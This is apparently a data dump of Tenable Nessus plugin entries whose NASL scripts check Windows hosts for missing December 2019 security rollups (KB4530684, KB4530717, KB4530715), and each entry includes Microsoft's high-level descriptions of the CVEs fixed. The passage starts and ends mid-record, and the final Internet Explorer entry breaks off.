"cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530684: Windows 10 Version 1903 and Windows 10 Version 1909 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1471", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1483", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2020-01-28T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530684.NASL", "href": "https://www.tenable.com/plugins/nessus/131926", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131926);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2020/01/28\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1471\",\n \"CVE-2019-1472\",\n \"CVE-2019-1474\",\n \"CVE-2019-1476\",\n \"CVE-2019-1483\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530684\");\n script_xref(name:\"MSFT\", value:\"MS19-4530684\");\n\n script_name(english:\"KB4530684: Windows 10 Version 1903 and Windows 10 Version 1909 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530684.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1471)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles\n junctions. (CVE-2019-1483)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists when\n Windows AppX Deployment Service (AppXSVC) improperly\n handles hard links. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1476)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\");\n # https://support.microsoft.com/en-us/help/4530684/windows-10-update-kb4530684\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6f732fcf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4530684.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530684');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530684])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530684])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:33:27", "description": "The remote Windows host is missing security update 4530717.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1471)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1472, CVE-2019-1474)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions. (CVE-2019-1483)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2019-1476)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1470)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530717: Windows 10 Version 1803 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1471", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1483", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2020-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530717.NASL", "href": "https://www.tenable.com/plugins/nessus/131933", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131933);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/17\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1471\",\n \"CVE-2019-1472\",\n \"CVE-2019-1474\",\n \"CVE-2019-1476\",\n \"CVE-2019-1483\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530717\");\n script_xref(name:\"MSFT\", value:\"MS19-4530717\");\n\n script_name(english:\"KB4530717: Windows 10 Version 1803 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530717.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1471)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles\n junctions. (CVE-2019-1483)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists when\n Windows AppX Deployment Service (AppXSVC) improperly\n handles hard links. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1476)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\");\n # https://support.microsoft.com/en-us/help/4530717/windows-10-update-kb4530717\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c65293b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4530717.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530717');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530717])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:33:11", "description": "The remote Windows host is missing security update 4530715.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1471)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1472, CVE-2019-1474)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions. (CVE-2019-1483)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An elevation of privilege vulnerability exists when the Windows Printer Service improperly validates file paths while loading printer drivers. An authenticated attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges.\n (CVE-2019-1477)\n\n - An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2019-1476)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1470)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530715: Windows 10 Version 1809 and Windows Server 2019 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1471", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1477", "CVE-2019-1483", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2020-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530715.NASL", "href": "https://www.tenable.com/plugins/nessus/131932", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131932);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/17\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1471\",\n \"CVE-2019-1472\",\n \"CVE-2019-1474\",\n \"CVE-2019-1476\",\n \"CVE-2019-1477\",\n \"CVE-2019-1483\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530715\");\n script_xref(name:\"MSFT\", value:\"MS19-4530715\");\n\n script_name(english:\"KB4530715: Windows 10 Version 1809 and Windows Server 2019 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530715.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1471)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles\n junctions. (CVE-2019-1483)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An elevation of privilege vulnerability exists when the\n Windows Printer Service improperly validates file paths\n while loading printer drivers. An authenticated attacker\n who successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges.\n (CVE-2019-1477)\n\n - An elevation of privilege vulnerability exists when\n Windows AppX Deployment Service (AppXSVC) improperly\n handles hard links. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1476)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\");\n # https://support.microsoft.com/en-us/help/4530715/windows-10-update-kb4530715\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a85b1357\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4530715.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530715');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530715])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:33:11", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by the following vulnerability :\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (December 2019)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1485"], "modified": "2020-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/131936", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131936);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/01/17\");\n\n script_cve_id(\"CVE-2019-1485\");\n script_xref(name:\"MSKB\", value:\"4530677\");\n script_xref(name:\"MSKB\", value:\"4530691\");\n script_xref(name:\"MSKB\", value:\"4530695\");\n script_xref(name:\"MSKB\", value:\"4530702\");\n script_xref(name:\"MSKB\", value:\"4530734\");\n 